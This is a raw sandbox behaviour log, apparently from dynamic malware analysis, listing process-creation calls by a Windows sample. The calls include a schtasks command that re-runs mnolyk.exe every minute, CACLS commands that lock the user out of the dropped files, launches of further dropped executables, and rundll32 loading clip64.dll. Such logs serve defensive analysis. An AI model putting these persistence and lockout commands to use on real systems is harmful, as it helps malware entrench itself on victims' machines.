current_directory: C:\Users\test22\AppData\Local\Temp\IXP000.TMP
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
filepath_r: C:\Windows\System32\schtasks.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002a8
1 1 0

CreateProcessInternalW

 thread_identifier: 2608
thread_handle: 0x00000228
process_identifier: 2596
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "test22:N"&&CACLS "..\4f9dd6f8a7" /P "test22:R" /E&&Exit
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000294
1 1 0

CreateProcessInternalW

 thread_identifier: 3040
thread_handle: 0x000003f4
process_identifier: 3020
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000420
1 1 0

CreateProcessInternalW

 thread_identifier: 2648
thread_handle: 0x00000408
process_identifier: 2664
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000042c
1 1 0

CreateProcessInternalW

 thread_identifier: 3692
thread_handle: 0x00000440
process_identifier: 3688
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Windows\System32\rundll32.exe
track: 1
command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
filepath_r: C:\Windows\System32\rundll32.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000458
1 1 0

CreateProcessInternalW

 thread_identifier: 2180
thread_handle: 0x00000140
process_identifier: 2224
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000148
1 1 0

CreateProcessInternalW

 thread_identifier: 1692
thread_handle: 0x0000013c
process_identifier: 524
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "mnolyk.exe" /P "test22:N"
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000140
1 1 0

CreateProcessInternalW

 thread_identifier: 2660
thread_handle: 0x00000140
process_identifier: 2672
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "mnolyk.exe" /P "test22:R" /E
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000148
1 1 0

CreateProcessInternalW

 thread_identifier: 2356
thread_handle: 0x00000140
process_identifier: 2852
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000144
1 1 0

CreateProcessInternalW

 thread_identifier: 2912
thread_handle: 0x00000148
process_identifier: 2924
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "..\4f9dd6f8a7" /P "test22:N"
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000140
1 1 0

CreateProcessInternalW

 thread_identifier: 2976
thread_handle: 0x00000140
process_identifier: 2972
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "..\4f9dd6f8a7" /P "test22:R" /E
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000144
1 1 0

NtResumeThread

 thread_handle: 0x0000016c
suspend_count: 1
process_identifier: 524
1 0 0

NtResumeThread

 thread_handle: 0x00000168
suspend_count: 1
process_identifier: 2672
1 0 0

NtResumeThread

 thread_handle: 0x0000016c
suspend_count: 1
process_identifier: 2924
1 0 0

NtResumeThread

 thread_handle: 0x00000164
suspend_count: 1
process_identifier: 2972
1 0 0

CreateProcessInternalW

 thread_identifier: 2312
thread_handle: 0x0000001c
process_identifier: 508
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\nXi14fa28.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000128
1 1 0